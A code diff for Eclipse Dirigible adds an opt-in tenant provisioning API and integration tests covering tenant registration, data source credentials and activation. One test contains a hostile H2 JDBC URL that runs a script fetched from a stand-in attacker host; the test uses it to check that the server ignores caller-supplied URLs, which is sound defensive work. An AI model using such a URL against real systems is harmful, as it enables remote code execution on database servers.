         <module>core/core-liquibase</module>
@@ -1642,6 +1643,11 @@
             <dependency>
                 <groupId>org.eclipse.dirigible</groupId>
                 <artifactId>dirigible-components-core-tenants</artifactId>
+                <version>${project.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>org.eclipse.dirigible</groupId>
+                <artifactId>dirigible-components-core-tenants-provisioning</artifactId>
                 <version>${project.version}</version>
             </dependency>
             <dependency>

--- a/modules/commons/commons-config/src/main/java/org/eclipse/dirigible/commons/config/DirigibleConfig.java
+++ b/modules/commons/commons-config/src/main/java/org/eclipse/dirigible/commons/config/DirigibleConfig.java
@@ -150,6 +150,15 @@ public enum DirigibleConfig {
      */
     TENANT_GROUPS_CLAIM("DIRIGIBLE_TENANT_GROUPS_CLAIM", "cognito:groups"),
 
+    /**
+     * Whether this deployment exposes the tenant provisioning API under
+     * {@code /services/tenant-provisioning/**}, through which an external provisioner registers a
+     * tenant with a caller-supplied id, registers its data source from credentials it created itself,
+     * and activates it. Off by default: the API hands out and accepts real database credentials, so a
+     * deployment has to opt in, and when it does not, none of the beans behind it exist at all.
+     */
+    TENANT_PROVISIONING_API_ENABLED("DIRIGIBLE_TENANT_PROVISIONING_API_ENABLED", Boolean.FALSE.toString()),
+
     SNOWFLAKE_ADMIN_USERNAME("DIRIGIBLE_SNOWFLAKE_ADMIN_USERNAME", null),
 
     /** The basic admin username. */

--- a/tests/tests-framework/src/main/java/org/eclipse/dirigible/tests/framework/security/SecurityUtil.java
+++ b/tests/tests-framework/src/main/java/org/eclipse/dirigible/tests/framework/security/SecurityUtil.java
@@ -33,6 +33,22 @@ public class SecurityUtil {
         this.roleService = roleService;
     }
 
+    /**
+     * Creates the role unless it exists. Needed for roles outside the {@link Roles} enum - a role a
+     * token carries as a scope, for instance - which no initializer creates a row for.
+     *
+     * @param roleName the role name
+     */
+    public void ensureRole(String roleName) {
+        if (roleService.roleExistsByName(roleName)) {
+            return;
+        }
+        Role role = new Role("TEST", roleName, "Created by an integration test");
+        role.setPhase(org.eclipse.dirigible.components.base.artefact.ArtefactPhase.CREATE);
+        role.updateKey();
+        roleService.save(role);
+    }
+
     public void createUserInDefaultTenant(String username, String password, String roleName) {
         User user = createUserInDefaultTenant(username, password);
 

--- a/tests/tests-integrations/src/main/java/org/eclipse/dirigible/integration/tests/api/TenantActivationIT.java
+++ b/tests/tests-integrations/src/main/java/org/eclipse/dirigible/integration/tests/api/TenantActivationIT.java
@@ -1,0 +1,371 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.integration.tests.api;
+
+import static io.restassured.RestAssured.given;
+import static org.hamcrest.Matchers.containsString;
+import static org.hamcrest.Matchers.equalTo;
+import static org.hamcrest.Matchers.not;
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.junit.jupiter.api.Assertions.assertFalse;
+import static org.junit.jupiter.api.Assertions.assertNotSame;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+import java.nio.charset.StandardCharsets;
+import java.sql.Connection;
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.Map;
+import java.util.concurrent.TimeUnit;
+
+import org.awaitility.Awaitility;
+import org.eclipse.dirigible.commons.config.Configuration;
+import org.eclipse.dirigible.commons.config.DirigibleConfig;
+import org.eclipse.dirigible.components.data.sources.manager.DataSourcesManager;
+import org.eclipse.dirigible.components.data.sources.service.DataSourceService;
+import org.eclipse.dirigible.components.database.DirigibleDataSource;
+import org.eclipse.dirigible.components.initializers.synchronizer.SynchronizationProcessor;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.eclipse.dirigible.components.tenants.service.TenantService;
+import org.eclipse.dirigible.database.sql.SqlFactory;
+import org.eclipse.dirigible.repository.api.IRepository;
+import org.eclipse.dirigible.repository.api.IRepositoryStructure;
+import org.eclipse.dirigible.tests.base.IntegrationTest;
+import org.eclipse.dirigible.tests.framework.restassured.RestAssuredExecutor;
+import org.junit.jupiter.api.AfterAll;
+import org.junit.jupiter.api.BeforeAll;
+import org.junit.jupiter.api.MethodOrderer;
+import org.junit.jupiter.api.Order;
+import org.junit.jupiter.api.Tag;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.api.TestMethodOrder;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.test.annotation.DirtiesContext;
+
+import io.restassured.http.ContentType;
+
+/**
+ * The whole external provisioning sequence, end to end, against a tenant whose database user and
+ * schema were created by something outside the platform - which is what this API exists for.
+ *
+ * <p>
+ * The test plays the external provisioner: it creates the user and the schema with plain SQL, the
+ * way a provisioning service would, and then drives the API - register, register the data source,
+ * activate, poll. What it asserts at the end is not a status but a table: a per-tenant artefact
+ * physically present in the schema the provisioner created, reached through the data source the API
+ * registered. Nothing short of that proves the tenant actually works.
+ *
+ * <p>
+ * The sequence is then run a second time in full. That is the promise the API makes to a retrying
+ * caller, and it is the promise most likely to rot: every call has to converge rather than collide.
+ */
+@DirtiesContext(classMode = DirtiesContext.ClassMode.AFTER_CLASS)
+@TestMethodOrder(MethodOrderer.OrderAnnotation.class)
+@Tag("slow")
+class TenantActivationIT extends IntegrationTest {
+
+    private static final String TENANTS_PATH = "/services/tenant-provisioning/tenants/";
+    private static final String PLATFORM_TENANTS_PATH = "/services/security/tenants/";
+
+    private static final String TENANT_ID = "tenant-activation-it";
+
+    /** Chosen by the external provisioner, deliberately not derived from the tenant id. */
+    private static final String SCHEMA = "TENANTACTIVATIONIT";
+    private static final String DB_USER = "U_TENANTACTIVATIONIT";
+    private static final String DB_PASSWORD = "tenant-activation-it-password";
+
+    /** The per-tenant artefact whose physical existence is the actual assertion. */
+    private static final String PROJECT = "tenant-activation-it";
+    private static final String TABLE = "TENANT_ACTIVATION_IT_ORDERS";
+
+    /** A full synchronization pass over the whole registry - generous on a loaded CI machine. */
+    private static final long INITIALIZATION_TIMEOUT_SECONDS = 300;
+
+    @Autowired
+    private RestAssuredExecutor restAssuredExecutor;
+
+    @Autowired
+    private IRepository repository;
+
+    @Autowired
+    private SynchronizationProcessor synchronizationProcessor;
+
+    @Autowired
+    private DataSourcesManager dataSourcesManager;
+
+    @Autowired
+    private DataSourceService dataSourceService;
+
+    @Autowired
+    private TenantService tenantService;
+
+    @BeforeAll
+    static void enableTheApi() {
+        DirigibleConfig.TENANT_PROVISIONING_API_ENABLED.setBooleanValue(true);
+    }
+
+    @AfterAll
+    static void disableTheApi() {
+        Configuration.remove(DirigibleConfig.TENANT_PROVISIONING_API_ENABLED.getKey());
+    }
+
+    @Test
+    @Order(1)
+    void theFullExternalSequenceMaterializesTheTenant() throws SQLException {
+        publishPerTenantArtefact();
+        createDatabaseUserAndSchema(DB_PASSWORD);
+
+        restAssuredExecutor.execute(() -> {
+            register().then()
+                      .statusCode(201)
+                      .body("status", equalTo(TenantStatus.PENDING_ACTIVATION.name()));
+
+            given().when()
+                   .get(TENANTS_PATH + TENANT_ID + "/activation")
+                   .then()
+                   .statusCode(200)
+                   .body("status", equalTo("NOT_STARTED"));
+
+            registerDataSource(DB_PASSWORD).then()
+                                           .statusCode(201);
+
+            // The answer must not already claim the work is done: a caller that polls the instant it
+            // is answered would otherwise skip the wait and use a tenant with nothing in it.
+            activate().then()
+                      .statusCode(202)
+                      .header("Location", TENANTS_PATH + TENANT_ID + "/activation")
+                      .body("status", not(equalTo("COMPLETED")));
+        });
+
+        awaitInitializationCompleted();
+
+        assertPerTenantTableExists();
+    }
+
+    /** Every call again, on a tenant that is already active - the retrying caller's path. */
+    @Test
+    @Order(2)
+    void theWholeSequenceConvergesWhenItIsRunAgain() throws SQLException {
+        restAssuredExecutor.execute(() -> {
+            register().then()
+                      .statusCode(200);
+
+            registerDataSource(DB_PASSWORD).then()
+                                           .statusCode(200);
+
+            activate().then()
+                      .statusCode(202);
+        });
+
+        awaitInitializationCompleted();
+
+        assertPerTenantTableExists();
+    }
+
+    /**
+     * An initialized connection pool keeps the credentials it was built with, whatever its definition
+     * later says - only removing it closes it. So a registration that did not replace the pool would
+     * leave a rotated password unused until the next restart, silently.
+     *
+     * <p>
+     * Asserted on the pool itself rather than on a rotated password, because rotating one portably
+     * across every database the suite runs on would need dialect-specific SQL, and what actually has to
+     * hold is this: the object serving the tenant after a registration is not the object that served it
+     * before.
+     */
+    @Test
+    @Order(3)
+    void theLivePoolIsReplacedByEveryRegistration() throws SQLException {
+        DirigibleDataSource before = dataSourcesManager.getDataSource(TENANT_ID + "_DefaultDB");
+
+        restAssuredExecutor.execute(() -> registerDataSource(DB_PASSWORD).then()
+                                                                         .statusCode(200));
+
+        DirigibleDataSource after = dataSourcesManager.getDataSource(TENANT_ID + "_DefaultDB");
+        assertNotSame(before, after, "a registration must replace the live pool, not just its definition");
+        assertEquals(DB_USER, dataSourceService.findOptionalByName(TENANT_ID + "_DefaultDB")
+                                               .orElseThrow()
+                                               .getUsername());
+        // and the replacement works - it is the pool the tenant is served from
+        assertPerTenantTableExists();
+    }
+
+    @Test
+    @Order(4)
+    void aTenantWithoutADataSourceCannotBeActivated() {
+        String withoutDataSource = "tenant-activation-it-no-ds";
+        restAssuredExecutor.execute(() -> {
+            given().contentType(ContentType.JSON)
+                   .body(Map.of("name", "No data source"))
+                   .when()
+                   .put(TENANTS_PATH + withoutDataSource)
+                   .then()
+                   .statusCode(201);
+
+            given().when()
+                   .post(TENANTS_PATH + withoutDataSource + "/activation")
+                   .then()
+                   .statusCode(400)
+                   .body("message", containsString(withoutDataSource + "_DefaultDB"));
+        });
+
+        assertEquals(TenantStatus.PENDING_ACTIVATION, tenantService.findById(withoutDataSource)
+                                                                   .orElseThrow()
+                                                                   .getStatus(),
+                "a refused activation must not have moved the tenant");
+    }
+
+    /**
+     * A wrong password has to be a wrong password - answered as such, with the database's own words,
+     * and leaving no definition behind that a later activation would try to use.
+     */
+    @Test
+    @Order(5)
+    void credentialsThatDoNotWorkAreRefusedAndNothingIsRegistered() {
+        String badCredentials = "tenant-activation-it-bad-creds";
+        restAssuredExecutor.execute(() -> {
+            given().contentType(ContentType.JSON)
+                   .body(Map.of("name", "Bad credentials"))
+                   .when()
+                   .put(TENANTS_PATH + badCredentials)
+                   .then()
+                   .statusCode(201);
+
+            given().contentType(ContentType.JSON)
+                   .body(Map.of("username", DB_USER, "password", "not-the-password", "schema", SCHEMA))
+                   .when()
+                   .put(TENANTS_PATH + badCredentials + "/datasources/default")
+                   .then()
+                   .statusCode(502)
+                   // the database's own complaint, not just "Bad Gateway"
+                   .body("message", containsString("password"));
+        });
+
+        assertFalse(dataSourceService.findOptionalByName(badCredentials + "_DefaultDB")
+                                     .isPresent(),
+                "credentials that were refused must not leave a data source definition behind");
+    }
+
+    /** Deleting an active tenant is deprovisioning, which this API deliberately does not do. */
+    @Test
+    @Order(6)
+    void anActivatedTenantCannotBeDeleted() {
+        restAssuredExecutor.execute(() -> given().when()
+                                                 .delete(PLATFORM_TENANTS_PATH + TENANT_ID)
+                                                 .then()
+                                                 .statusCode(400));
+
+        assertTrue(tenantService.findById(TENANT_ID)
+                                .isPresent());
+    }
+
+    private static io.restassured.response.Response register() {
+        return given().contentType(ContentType.JSON)
+                      .body(Map.of("name", "Tenant Activation IT"))
+                      .when()
+                      .put(TENANTS_PATH + TENANT_ID);
+    }
+
+    private static io.restassured.response.Response registerDataSource(String password) {
+        return given().contentType(ContentType.JSON)
+                      .body(Map.of("username", DB_USER, "password", password, "schema", SCHEMA))
+                      .when()
+                      .put(TENANTS_PATH + TENANT_ID + "/datasources/default");
+    }
+
+    private static io.restassured.response.Response activate() {
+        return given().when()
+                      .post(TENANTS_PATH + TENANT_ID + "/activation");
+    }
+
+    private void awaitInitializationCompleted() {
+        Awaitility.await()
+                  .atMost(INITIALIZATION_TIMEOUT_SECONDS, TimeUnit.SECONDS)
+                  .pollInterval(2, TimeUnit.SECONDS)
+                  .until(() -> "COMPLETED".equals(initializationStatus()));
+    }
+
+    private String initializationStatus() {
+        return restAssuredExecutor.executeWithResult(() -> given().when()
+                                                                  .get(TENANTS_PATH + TENANT_ID + "/activation")
+                                                                  .then()
+                                                                  .statusCode(200)
+                                                                  .extract()
+                                                                  .path("status"));
+    }
+
+    /** Writes a per-tenant artefact into the registry and reconciles it for the tenants of today. */
+    private void publishPerTenantArtefact() {
+        String table = """
+                {
+                    "name": "%s",
+                    "type": "TABLE",
+                    "columns": [
+                        {
+                            "name": "ORDER_ID",
+                            "type": "INTEGER",
+                            "length": "0",
+                            "nullable": "false",
+                            "primaryKey": "true"
+                        }
+                    ]
+                }
+                """.formatted(TABLE);
+        repository.createResource(IRepositoryStructure.PATH_REGISTRY_PUBLIC + "/" + PROJECT + "/" + TABLE + ".table",
+                table.getBytes(StandardCharsets.UTF_8), false, "application/json", true);
+        synchronizationProcessor.forceProcessSynchronizers();
+    }
+
+    /**
+     * What the external provisioner does before it ever calls the API: create the tenant's database
+     * user and its schema. Through the platform's own SQL dialect factory, so the test works on every
+     * database the integration suite runs against.
+     *
+     * @param password the password to create the user with
+     * @throws SQLException if the statements fail
+     */
+    private void createDatabaseUserAndSchema(String password) throws SQLException {
+        DirigibleDataSource defaultDataSource = dataSourcesManager.getDefaultDataSource();
+        try (Connection connection = defaultDataSource.getConnection()) {
+            execute(connection, SqlFactory.getNative(connection)
+                                          .create()
+                                          .user(DB_USER, password)
+                                          .build());
+            execute(connection, SqlFactory.getNative(connection)
+                                          .create()
+                                          .schema(SCHEMA)
+                                          .authorization(DB_USER)
+                                          .build());
+        }
+    }
+
+    private static void execute(Connection connection, String sql) throws SQLException {
+        try (PreparedStatement statement = connection.prepareStatement(sql)) {
+            statement.execute();
+        }
+    }
+
+    /**
+     * The assertion the whole test exists for: the per-tenant artefact is physically there, in the
+     * schema the external provisioner created, reached through the data source the API registered.
+     *
+     * @throws SQLException if the table cannot be read
+     */
+    private void assertPerTenantTableExists() throws SQLException {
+        DirigibleDataSource tenantDataSource = dataSourcesManager.getDataSource(TENANT_ID + "_DefaultDB");
+        try (Connection connection = tenantDataSource.getConnection();
+                Statement statement = connection.createStatement();
+                ResultSet resultSet = statement.executeQuery("SELECT COUNT(*) FROM " + SCHEMA + "." + TABLE)) {
+            assertTrue(resultSet.next(), "table " + SCHEMA + "." + TABLE + " must exist in the tenant's schema");
+        }
+    }
+}

--- a/tests/tests-integrations/src/main/java/org/eclipse/dirigible/integration/tests/api/TenantActivationIT.java
+++ b/tests/tests-integrations/src/main/java/org/eclipse/dirigible/integration/tests/api/TenantActivationIT.java
@@ -30,6 +30,7 @@ import java.util.concurrent.TimeUnit;
 import org.awaitility.Awaitility;
 import org.eclipse.dirigible.commons.config.Configuration;
 import org.eclipse.dirigible.commons.config.DirigibleConfig;
+import org.eclipse.dirigible.components.data.sources.domain.DataSource;
 import org.eclipse.dirigible.components.data.sources.manager.DataSourcesManager;
 import org.eclipse.dirigible.components.data.sources.service.DataSourceService;
 import org.eclipse.dirigible.components.database.DirigibleDataSource;
@@ -266,6 +267,38 @@ class TenantActivationIT extends IntegrationTest {
 
         assertTrue(tenantService.findById(TENANT_ID)
                                 .isPresent());
+    }
+
+    /**
+     * A JDBC URL and driver sent by a caller must not reach the driver layer.
+     *
+     * <p>
+     * They are executable surface: an H2 URL can carry {@code INIT=RUNSCRIPT FROM '<url>'} and a
+     * PostgreSQL connection property can name a {@code socketFactory} class, so honouring one would
+     * turn the right to register a tenant's credentials into the right to run code on this server. The
+     * fields are not part of the API; this asserts what that means end to end - the request succeeds,
+     * and the definition it produced carries the application's own URL and driver.
+     */
+    @Test
+    @Order(7)
+    void aJdbcUrlAndDriverInTheRequestBodyAreIgnored() {
+        String hostileUrl = "jdbc:h2:mem:pwned;INIT=RUNSCRIPT FROM 'http://attacker.example/evil.sql'";
+        DataSource applicationDataSource = dataSourceService.findOptionalByName("DefaultDB")
+                                                            .orElseThrow();
+
+        restAssuredExecutor.execute(() -> given().contentType(ContentType.JSON)
+                                                 .body(Map.of("username", DB_USER, "password", DB_PASSWORD, "schema", SCHEMA, "url",
+                                                         hostileUrl, "driver", "org.postgresql.Driver"))
+                                                 .when()
+                                                 .put(TENANTS_PATH + TENANT_ID + "/datasources/default")
+                                                 .then()
+                                                 .statusCode(200));
+
+        DataSource registered = dataSourceService.findOptionalByName(TENANT_ID + "_DefaultDB")
+                                                 .orElseThrow();
+        assertEquals(applicationDataSource.getUrl(), registered.getUrl(),
+                "the URL must come from the application's own data source, never from the request");
+        assertEquals(applicationDataSource.getDriver(), registered.getDriver());
     }
 
     private static io.restassured.response.Response register() {

--- a/tests/tests-integrations/src/main/java/org/eclipse/dirigible/integration/tests/api/TenantProvisioningApiDisabledIT.java
+++ b/tests/tests-integrations/src/main/java/org/eclipse/dirigible/integration/tests/api/TenantProvisioningApiDisabledIT.java
@@ -1,0 +1,77 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.integration.tests.api;
+
+import static io.restassured.RestAssured.given;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+import java.util.Map;
+
+import org.eclipse.dirigible.tests.base.IntegrationTest;
+import org.eclipse.dirigible.tests.framework.restassured.RestAssuredExecutor;
+import org.junit.jupiter.api.Test;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.context.ApplicationContext;
+import org.springframework.test.annotation.DirtiesContext;
+
+import io.restassured.http.ContentType;
+
+/**
+ * A deployment that did not ask for the tenant provisioning API does not have it.
+ *
+ * <p>
+ * The distinction being pinned is between absent and merely refusing. The API accepts database
+ * credentials over HTTP and can move a tenant into service, so the default has to be that none of
+ * it is there - no endpoint answering, no bean holding the logic. Nothing here switches anything
+ * on; the default is the whole point.
+ */
+@DirtiesContext(classMode = DirtiesContext.ClassMode.AFTER_CLASS)
+class TenantProvisioningApiDisabledIT extends IntegrationTest {
+
+    private static final String[] PATHS = { //
+            "/services/tenant-provisioning/tenants/anything", //
+            "/services/tenant-provisioning/tenants/anything/activation"};
+
+    @Autowired
+    private RestAssuredExecutor restAssuredExecutor;
+
+    @Autowired
+    private ApplicationContext applicationContext;
+
+    /** An administrator, so a 404 says "no such endpoint" rather than "not for you". */
+    @Test
+    void noEndpointAnswersUnderTheProvisioningPrefix() {
+        restAssuredExecutor.execute(() -> {
+            for (String path : PATHS) {
+                given().when()
+                       .get(path)
+                       .then()
+                       .statusCode(404);
+            }
+            given().contentType(ContentType.JSON)
+                   .body(Map.of("name", "Nothing"))
+                   .when()
+                   .put(PATHS[0])
+                   .then()
+                   .statusCode(404);
+        });
+    }
+
+    @Test
+    void noneOfTheProvisioningBeansExist() {
+        String[] beans = applicationContext.getBeanDefinitionNames();
+        for (String bean : beans) {
+            Class<?> type = applicationContext.getType(bean);
+            assertTrue(type == null || !type.getPackageName()
+                                            .equals("org.eclipse.dirigible.components.tenants.provisioning.external"),
+                    "the disabled tenant provisioning API must contribute no beans, found: " + bean);
+        }
+    }
+}

--- a/tests/tests-integrations/src/main/java/org/eclipse/dirigible/integration/tests/api/TenantProvisioningApiIT.java
+++ b/tests/tests-integrations/src/main/java/org/eclipse/dirigible/integration/tests/api/TenantProvisioningApiIT.java
@@ -137,6 +137,45 @@ class TenantProvisioningApiIT extends IntegrationTest {
      * Every refusal has to say why. The caller is a program that must act differently on each one, and
      * the operator reading its logs learns nothing from a bare status either.
      */
+    /**
+     * Two tenants may carry the same display name - two customers really can both be "Acme Ltd".
+     *
+     * <p>
+     * A tenant is an artefact, and an artefact's unique key is {@code type:location:name}. Registering
+     * under a constant location made the display name the unique part, so the second tenant of that
+     * name hit {@code UK_DIRIGIBLE_TENANTS_ARTEFACT_KEY} and the caller got an unhandled 500. Asserted
+     * against the real index rather than against the composed key, since that is where it failed.
+     */
+    @Test
+    void twoTenantsMayShareADisplayName() {
+        restAssuredExecutor.execute(() -> {
+            register("provisioning-api-it-twin-a", "Acme Ltd").then()
+                                                              .statusCode(201);
+            register("provisioning-api-it-twin-b", "Acme Ltd").then()
+                                                              .statusCode(201);
+        });
+
+        assertTrue(tenantService.findById("provisioning-api-it-twin-a")
+                                .isPresent());
+        assertTrue(tenantService.findById("provisioning-api-it-twin-b")
+                                .isPresent());
+    }
+
+    /** Renaming a tenant onto a name another tenant already uses is likewise not a collision. */
+    @Test
+    void aTenantMayBeRenamedOntoAnotherTenantsName() {
+        restAssuredExecutor.execute(() -> {
+            register("provisioning-api-it-rename-a", "Original").then()
+                                                                .statusCode(201);
+            register("provisioning-api-it-rename-b", "Other").then()
+                                                             .statusCode(201);
+
+            register("provisioning-api-it-rename-b", "Original").then()
+                                                                .statusCode(200)
+                                                                .body("name", equalTo("Original"));
+        });
+    }
+
     @Test
     void anIdThatCannotBeAnIdentityProviderGroupSegmentIsRefused() {
         restAssuredExecutor.execute(() -> {

--- a/tests/tests-integrations/src/main/java/org/eclipse/dirigible/integration/tests/api/TenantProvisioningApiIT.java
+++ b/tests/tests-integrations/src/main/java/org/eclipse/dirigible/integration/tests/api/TenantProvisioningApiIT.java
@@ -1,0 +1,279 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.integration.tests.api;
+
+import static io.restassured.RestAssured.given;
+import static org.hamcrest.Matchers.containsString;
+import static org.hamcrest.Matchers.equalTo;
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.junit.jupiter.api.Assertions.assertFalse;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+import java.util.Map;
+
+import org.eclipse.dirigible.commons.config.Configuration;
+import org.eclipse.dirigible.commons.config.DirigibleConfig;
+import org.eclipse.dirigible.components.data.sources.service.DataSourceService;
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.eclipse.dirigible.components.tenants.service.TenantService;
+import org.eclipse.dirigible.tests.base.IntegrationTest;
+import org.eclipse.dirigible.tests.framework.restassured.RestAssuredExecutor;
+import org.eclipse.dirigible.tests.framework.security.SecurityUtil;
+import org.eclipse.dirigible.tests.framework.tenant.DirigibleTestTenant;
+import org.junit.jupiter.api.AfterAll;
+import org.junit.jupiter.api.BeforeAll;
+import org.junit.jupiter.api.Test;
+import org.quartz.JobKey;
+import org.quartz.Scheduler;
+import org.quartz.SchedulerException;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.test.annotation.DirtiesContext;
+
+import io.restassured.http.ContentType;
+
+/**
+ * Registering a tenant from the outside, and the promises the registration makes.
+ *
+ * <p>
+ * The API is switched on in a static {@code @BeforeAll}, which is what makes it take effect: its
+ * beans are conditional on a configuration value read when the Spring context is refreshed, and
+ * that happens after every {@code @BeforeAll} has run. The context is dirtied after the class, so
+ * the switch does not leak into the next one.
+ *
+ * <p>
+ * Activation and everything it materializes live in {@code TenantActivationIT}; this class covers
+ * what a provisioner does before it - and the one thing that must NOT happen in between, which is
+ * the platform's own provisioner adopting a tenant somebody else is provisioning.
+ */
+@DirtiesContext(classMode = DirtiesContext.ClassMode.AFTER_CLASS)
+class TenantProvisioningApiIT extends IntegrationTest {
+
+    private static final String TENANTS_PATH = "/services/tenant-provisioning/tenants/";
+    private static final String PLATFORM_TENANTS_PATH = "/services/security/tenants/";
+
+    private static final String TENANT_ID = "provisioning-api-it";
+    private static final String OTHER_TENANT_ID = "provisioning-api-it-other";
+    private static final String ROLLBACK_TENANT_ID = "provisioning-api-it-rollback";
+    private static final String UNPROTECTED_TENANT_ID = "provisioning-api-it-authz";
+
+    private static final String PLAIN_USER = "provisioning-api-it-plain";
+    private static final String PROVISIONER_USER = "provisioning-api-it-provisioner";
+    private static final String PASSWORD = "provisioning-api-it-password";
+
+    /** Deliberately not in the Roles enum - it is carried by a machine-to-machine token. */
+    private static final String TENANT_PROVISIONER = "TENANT_PROVISIONER";
+
+    @Autowired
+    private RestAssuredExecutor restAssuredExecutor;
+
+    @Autowired
+    private SecurityUtil securityUtil;
+
+    @Autowired
+    private TenantService tenantService;
+
+    @Autowired
+    private DataSourceService dataSourceService;
+
+    @Autowired
+    private Scheduler scheduler;
+
+    @BeforeAll
+    static void enableTheApi() {
+        DirigibleConfig.TENANT_PROVISIONING_API_ENABLED.setBooleanValue(true);
+    }
+
+    @AfterAll
+    static void disableTheApi() {
+        Configuration.remove(DirigibleConfig.TENANT_PROVISIONING_API_ENABLED.getKey());
+    }
+
+    @Test
+    void aTenantIsRegisteredPendingActivationAndCanBeReadBack() {
+        restAssuredExecutor.execute(() -> {
+            register(TENANT_ID, "Acme Ltd").then()
+                                           .statusCode(201)
+                                           .body("id", equalTo(TENANT_ID))
+                                           .body("name", equalTo("Acme Ltd"))
+                                           .body("subdomain", equalTo(TENANT_ID))
+                                           .body("status", equalTo(TenantStatus.PENDING_ACTIVATION.name()))
+                                           .body("initialization.status", equalTo("NOT_STARTED"));
+
+            given().when()
+                   .get(TENANTS_PATH + TENANT_ID)
+                   .then()
+                   .statusCode(200)
+                   .body("status", equalTo(TenantStatus.PENDING_ACTIVATION.name()))
+                   .body("initialization.status", equalTo("NOT_STARTED"));
+        });
+    }
+
+    /**
+     * The provisioner that calls this API is a retrying process, so the same registration arriving
+     * twice has to converge rather than collide.
+     */
+    @Test
+    void registeringTheSameTenantAgainUpdatesItInsteadOfFailing() {
+        restAssuredExecutor.execute(() -> {
+            register(OTHER_TENANT_ID, "Globex").then()
+                                               .statusCode(201);
+
+            register(OTHER_TENANT_ID, "Globex Corporation").then()
+                                                           .statusCode(200)
+                                                           .body("name", equalTo("Globex Corporation"))
+                                                           .body("status", equalTo(TenantStatus.PENDING_ACTIVATION.name()));
+        });
+    }
+
+    /**
+     * Every refusal has to say why. The caller is a program that must act differently on each one, and
+     * the operator reading its logs learns nothing from a bare status either.
+     */
+    @Test
+    void anIdThatCannotBeAnIdentityProviderGroupSegmentIsRefused() {
+        restAssuredExecutor.execute(() -> {
+            register("acme.corp", "Dotted").then()
+                                           .statusCode(400)
+                                           .body("message", containsString("acme.corp"));
+            register("-acme", "Leading hyphen").then()
+                                               .statusCode(400);
+        });
+    }
+
+    @Test
+    void aBodyWithoutANameIsRefusedNamingTheField() {
+        restAssuredExecutor.execute(() -> given().contentType(ContentType.JSON)
+                                                 .body(Map.of())
+                                                 .when()
+                                                 .put(TENANTS_PATH + "provisioning-api-it-nameless")
+                                                 .then()
+                                                 .statusCode(400)
+                                                 .body("message", containsString("name")));
+    }
+
+    @Test
+    void anUnknownTenantIsNotFound() {
+        restAssuredExecutor.execute(() -> given().when()
+                                                 .get(TENANTS_PATH + "provisioning-api-it-nowhere")
+                                                 .then()
+                                                 .statusCode(404));
+    }
+
+    /** The subdomain column is unique platform-wide; the conflict has to name the tenant holding it. */
+    @Test
+    void aSubdomainHeldByAnotherTenantIsAConflict() {
+        restAssuredExecutor.execute(() -> {
+            registerWithSubdomain("provisioning-api-it-sub-a", "A", "provisioning-api-it-shared").then()
+                                                                                                 .statusCode(201);
+
+            registerWithSubdomain("provisioning-api-it-sub-b", "B", "provisioning-api-it-shared").then()
+                                                                                                 .statusCode(409)
+                                                                                                 .body("message", containsString(
+                                                                                                         "provisioning-api-it-sub-a"));
+        });
+    }
+
+    /**
+     * The invariant the whole external flow rests on: a tenant somebody else is provisioning must not
+     * be adopted by the platform's own provisioner, which would create a database user and a schema of
+     * its own beside the ones that already exist.
+     *
+     * <p>
+     * A genuinely INITIAL tenant is provisioned alongside it, which is what makes the assertion sound:
+     * it proves the provisioning run actually happened and completed, so the externally owned tenant
+     * being untouched is a decision rather than a race the test won.
+     */
+    @Test
+    void theBuiltInProvisionerLeavesAnExternallyOwnedTenantAlone() throws SchedulerException {
+        String externallyOwned = "provisioning-api-it-untouched";
+        restAssuredExecutor.execute(() -> register(externallyOwned, "Untouched").then()
+                                                                                .statusCode(201));
+
+        DirigibleTestTenant ownedByThePlatform = new DirigibleTestTenant("provisioning-api-it-builtin");
+        createTenants(ownedByThePlatform);
+        scheduler.triggerJob(JobKey.jobKey("TenantsProvisioningJob", "system"));
+        waitForTenantProvisioning(ownedByThePlatform);
+
+        Tenant tenant = tenantService.findById(externallyOwned)
+                                     .orElseThrow();
+        assertEquals(TenantStatus.PENDING_ACTIVATION, tenant.getStatus(),
+                "the built-in provisioner must not activate a tenant it does not own");
+        assertFalse(dataSourceService.findOptionalByName(externallyOwned + "_DefaultDB")
+                                     .isPresent(),
+                "the built-in provisioner must not create a data source for a tenant it does not own");
+    }
+
+    /** The rollback path: a provisioner that gives up before activating can take the tenant back. */
+    @Test
+    void aTenantThatWasNeverActivatedCanBeDeleted() {
+        restAssuredExecutor.execute(() -> {
+            register(ROLLBACK_TENANT_ID, "Rolled back").then()
+                                                       .statusCode(201);
+
+            given().when()
+                   .delete(PLATFORM_TENANTS_PATH + ROLLBACK_TENANT_ID)
+                   .then()
+                   .statusCode(204);
+
+            given().when()
